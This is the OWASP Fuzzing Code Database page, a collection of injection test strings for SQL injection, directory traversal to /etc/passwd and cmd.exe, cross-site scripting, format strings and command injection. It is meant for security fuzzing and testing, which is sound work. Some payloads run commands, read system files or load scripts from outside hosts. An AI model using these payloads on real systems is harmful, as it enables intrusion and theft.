Category:OWASP Fuzzing Code Database

This database is a collection of several statements used in code injection software. All too often security professionals use their own repositories of statements collected from several projects for a long time. We want to collect all these statements, merging the statements from several projects like WebScarab and JBroFuzz with member contributions to gain a comprehensive dataset of effective statements to provide better testing results. Please add your own statements and check out the statements already added.

SQL Injection Statements
'sqlvuln '+sqlvuln sqlvuln; (sqlvuln) a' or 1=1-- a" or 1=1-- " or "a" = "a a' or 'a' = 'a 1 or 1=1 a' waitfor delay '0:0:10'-- 1 waitfor delay '0:0:10'-- declare @q nvarchar (4000) select @q = 0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A 0 031003000270000 declare @s varchar(22) select @s = 0x77616974666F722064656C61792027303A303A31302700 exec(@s) declare @q nvarchar (4000) select @q = 0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q) declare @s varchar (8000) select @s = 0x73656c65637420404076657273696f6e exec(@s) a' ? ' or 1=1 ‘ or 1=1 -- x' AND userid IS NULL; -- x' AND email IS NULL; -- anything' OR 'x'='x x' AND 1=(SELECT COUNT(*) FROM tabname); -- x' AND members.email IS NULL; -- x' OR full_name LIKE '%Bob% 23 OR 1=1 '; exec master..xp_cmdshell 'ping 172.10.1.255'--

Directory Traversal Statements
\..\WINDOWS\win.ini \..\..\WINDOWS\win.ini \..\..\..\WINDOWS\win.ini \..\..\..\..\WINDOWS\win.ini \..\..\..\..\..\WINDOWS\win.ini \..\..\..\..\..\..\WINDOWS\win.ini %5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69 %5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69 %5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69 %5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69 %5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69 %5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69 %5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69 %%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39 %%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39 %%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39 %%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39 ..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\ ..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\ ..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\ ..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\ ..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\ ..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\ ..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\ %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c %2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c %2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c %2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c ../../../../../../../../../etc/passwd ../../../../../../../../etc/passwd ../../../../../../../etc/passwd ../../../../../../etc/passwd ../../../../../etc/passwd ../../../../etc/passwd ../../../etc/passwd %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64 %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64 %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64 %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64 %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64 %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64 %2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64 %2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64 %%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34 %%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34 %%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34 %%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34 ../../../.htaccess ../../.htaccess ../.htaccess .htaccess ././.htaccess %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73 %2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73 %2e%2e%2f%2e%68%74%61%63%63%65%73%73 %2e%68%74%61%63%63%65%73%73 %2e%2f%2e%2f%2e%68%74%61%63%63%65%73%73 %%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33 %%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33 %%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33 %%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33 %%32%65%%32%66%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33 Sorry for breaking the layout - but "breaking the layout" could become "breaking the software".

XSS Statements - Most effective/most common statements
Testing Statements ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->">'>alert(String.fromCharCode(88,83,83)) '';!--"=&{}

Common exploit code (covers a lot of XSS vulnerabilities) '>alert(String.fromCharCode(88,83,83))alert(String.fromCharCode(88,83,83))alert(String.fromCharCode(88,83,83))alert(String.fromCharCode(88,83,83));

XSS Statements - Full List
</SCRIPT> <IMG SRC="javascript:alert('XSS');"> <IMG SRC=javascript:alert('XSS')> <IMG SRC=JaVaScRiPt:alert('XSS')> <IMG SRC=javascript:alert(&quot;XSS&quot;)> <IMG SRC=`javascript:alert("RSnake says, 'XSS'")`> <IMG """>alert("XSS")</SCRIPT>"> <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> <IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;> <IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041> <IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29> <IMG SRC="jav	ascript:alert('XSS');"> <IMG SRC="jav&#x09;ascript:alert('XSS');"> <IMG SRC="jav&#x0A;ascript:alert('XSS');"> <IMG SRC="jav&#x0D;ascript:alert('XSS');"> perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out <IMG SRC=" &#14; javascript:alert('XSS');"> </SCRIPT> <BODY onload!#$%&*~+-_.,:;?@[/|\]^`=alert("XSS")> </SCRIPT> <alert("XSS");//<</SCRIPT>   <IMG SRC="javascript:alert('XSS')" <iframe src=http://ha.ckers.org/scriptlet.html < a=/XSS/\nalert(a.source)</SCRIPT> \";alert('XSS');// </TITLE>alert("XSS");</SCRIPT> <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"> <BODY BACKGROUND="javascript:alert('XSS')"> <BODY ONLOAD=alert('XSS')> <IMG DYNSRC="javascript:alert('XSS')"> <IMG LOWSRC="javascript:alert('XSS')"> <BGSOUND SRC="javascript:alert('XSS');"> <BR SIZE="&{alert('XSS')}"> <LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER> <LINK REL="stylesheet" HREF="javascript:alert('XSS');"> <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css"> <STYLE>@import'http://ha.ckers.org/xss.css';</STYLE> <META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet"> <STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE> <XSS STYLE="behavior: url(xss.htc);"> <STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS <IMG SRC='vbscript:msgbox("XSS")'> ¼script¾alert(¢XSS¢)¼/script¾ <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');"> <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"> <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');"> <IFRAME SRC="javascript:alert('XSS');"></IFRAME> <FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET> <TABLE BACKGROUND="javascript:alert('XSS')"> <TABLE><TD BACKGROUND="javascript:alert('XSS')"> <DIV STYLE="background-image: url(javascript:alert('XSS'))"> <DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029"> <DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))"> <DIV STYLE="width: expression(alert('XSS'));"> <STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE> <IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))"> <XSS STYLE="xss:expression(alert('XSS'))"> exp/*<A STYLE='no\xss:noxss("*//*");xss:&#101;x&#x2F;*XSS*//*/*/pression(alert("XSS"))'> <STYLE TYPE="text/javascript">alert('XSS');</STYLE> <STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A> <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

<BASE HREF="javascript:alert('XSS');//"> <OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT> <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT> <EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED> <EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED> <HTML xmlns:xss><?import namespace="xss" implementation="http://ha.ckers.org/xss.htc"><xss:xss>XSS</xss:xss></HTML> <XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]></C></X> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN> <XML ID="xss"><I><B>&lt;IMG SRC="javascript:alert('XSS')"&gt;</B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN> <XML SRC="xsstest.xml" ID=I></XML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN> <HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS&lt;SCRIPT DEFER&gt;alert(&quot;XSS&quot;)&lt;/SCRIPT&gt;"></BODY></HTML> </SCRIPT>

<? echo('<SCR)';echo('IPT>alert("XSS")</SCRIPT>'); ?> <META HTTP-EQUIV="Set-Cookie" Content="USERID=&lt;SCRIPT&gt;alert('XSS')&lt;/SCRIPT&gt;"> <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4- " SRC="http://ha.ckers.org/xss.js"></SCRIPT> " SRC="http://ha.ckers.org/xss.js"></SCRIPT> " '' SRC="http://ha.ckers.org/xss.js"></SCRIPT> '" SRC="http://ha.ckers.org/xss.js"></SCRIPT> ` SRC="http://ha.ckers.org/xss.js"></SCRIPT> '>" SRC="http://ha.ckers.org/xss.js"></SCRIPT> document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT> <A HREF="http://66.102.7.147/">XSS</A> <A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">XSS</A> <A HREF="http://1113982867/">XSS</A> <A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A> <A HREF="http://0102.0146.0007.00000223/">XSS</A> <A HREF="h\ntt\tp://6&#9;6.000146.0x7.147/">XSS</A> <A HREF="//www.google.com/">XSS</A> <A HREF="//google">XSS</A> <A HREF="http://google.com/">XSS</A> <A HREF="http://www.google.com./">XSS</A> <A HREF="javascript:document.location='http://www.google.com/'">XSS</A> <A HREF="http://www.gohttp://www.google.com/ogle.com/">XSS</A> <a href="javas&#99;ript&#35;document.write("XSS-XSS-XSS");"> <a href="javas&#99;ript&#35;document.write("XSS-XSS-XSS");"> <div onmouseover="document.write("XSS-XSS-XSS");"> <img src="javascript:document.write("XSS-XSS-XSS");"> <img dynsrc="javascript:document.write("XSS-XSS-XSS");"> <input type="image" dynsrc="javascript:document.write("XSS-XSS-XSS");"> <bgsound src="javascript:document.write("XSS-XSS-XSS");"> & document.write("XSS-XSS-XSS"); &{document.write("XSS-XSS-XSS");}; <img src=&{document.write("XSS-XSS-XSS");};> <link rel="stylesheet" href="javascript:document.write("XSS-XSS-XSS");"> <iframe src="vbscript:document.write("XSS-XSS-XSS");"> <img src="mocha:document.write("XSS-XSS-XSS");"> <img src="livescript:document.write("XSS-XSS-XSS");"> <a href="about:<s&#99;ript>document.write("XSS-XSS-XSS"); "> <meta http-equiv="refresh" content="0;url=javascript:document.write("XSS-XSS-XSS");"> <body onload="document.write("XSS-XSS-XSS");"> <div style="background-image: url(javascript:document.write("XSS-XSS-XSS"););"> <div style="behaviour: url([link to code]);"> <div style="binding: url([link to code]);"> <div style="width: expression(document.write("XSS-XSS-XSS"););"> <style type="text/javascript">document.write("XSS-XSS-XSS"); <object classid="clsid:..." codebase="javascript:document.write("XSS-XSS-XSS");"> <![CDATA[ document.write("XSS-XSS-XSS"); < document.write("XSS-XSS-XSS"); <img src="blah"onmouseover="document.write("XSS-XSS-XSS");"> " onmouseover="document.write("XSS-XSS-XSS");"> <xml src="javascript:document.write("XSS-XSS-XSS");"> <xml id="X"><a>&lt;script>document.write("XSS-XSS-XSS");&lt;/script>;</a> <a href="javas&#99;ript&#35;document.write("XSS-XSS-XSS");"> <div onmouseover="document.write("XSS-XSS-XSS");"> <img src="javascript:document.write("XSS-XSS-XSS");"> <img dynsrc="javascript:document.write("XSS-XSS-XSS");"> <input type="image" dynsrc="javascript:document.write("XSS-XSS-XSS");"> <bgsound src="javascript:document.write("XSS-XSS-XSS");"> & document.write("XSS-XSS-XSS"); &{document.write("XSS-XSS-XSS");}; <img src=&{document.write("XSS-XSS-XSS");};> <link rel="stylesheet" href="javascript:document.write("XSS-XSS-XSS");"> <iframe src="vbscript:document.write("XSS-XSS-XSS");"> <img src="mocha:document.write("XSS-XSS-XSS");"> <img src="livescript:document.write("XSS-XSS-XSS");"> <a href="about:<s&#99;ript>document.write("XSS-XSS-XSS"); "> <meta http-equiv="refresh" content="0;url=javascript:document.write("XSS-XSS-XSS");"> <body onload="document.write("XSS-XSS-XSS");"> <div style="background-image: url(javascript:document.write("XSS-XSS-XSS"););"> <div style="behaviour: url([link to code]);"> <div style="binding: url([link to code]);"> [Mozilla] <div style="width: expression(document.write("XSS-XSS-XSS"););"> <style type="text/javascript">document.write("XSS-XSS-XSS"); <object classid="clsid:..." codebase="javascript:document.write("XSS-XSS-XSS");"> <![CDATA[ document.write("XSS-XSS-XSS"); < document.write("XSS-XSS-XSS"); <img src="blah"onmouseover="document.write("XSS-XSS-XSS");"> " onmouseover="document.write("XSS-XSS-XSS");"> <xml src="javascript:document.write("XSS-XSS-XSS");"> <xml id="X"><a>&lt;script>document.write("XSS-XSS-XSS");&lt;/script>;</a> [\xC0][\xBC]script>document.write("XSS-XSS-XSS");[\xC0][\xBC]/script>

Format String Statements
%s%p%x%d .1024d %.2049d %p%p%p%p %x%x%x%x %d%d%d%d %s%s%s%s %99999999999s %08x %%20d %%20n %%20x %%20s %s%s%s%s%s%s%s%s%s%s %p%p%p%p%p%p%p%p%p%p %#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%% f(x)=%s x 123 f(x)=%x x 255 %x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x %s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s XXXXX.%p XXXXX`perl -e 'print ".%p" x 80'` `perl -e 'print ".%p" x 80'`%n %08x.%08x.%08x.%08x.%08x\n XXX0_%08x.%08x.%08x.%08x.%08x\n %.16705u%2\$hn \x10\x01\x48\x08_%08x.%08x.%08x.%08x.%08x|%s|
 * id > /tmp/file; exit;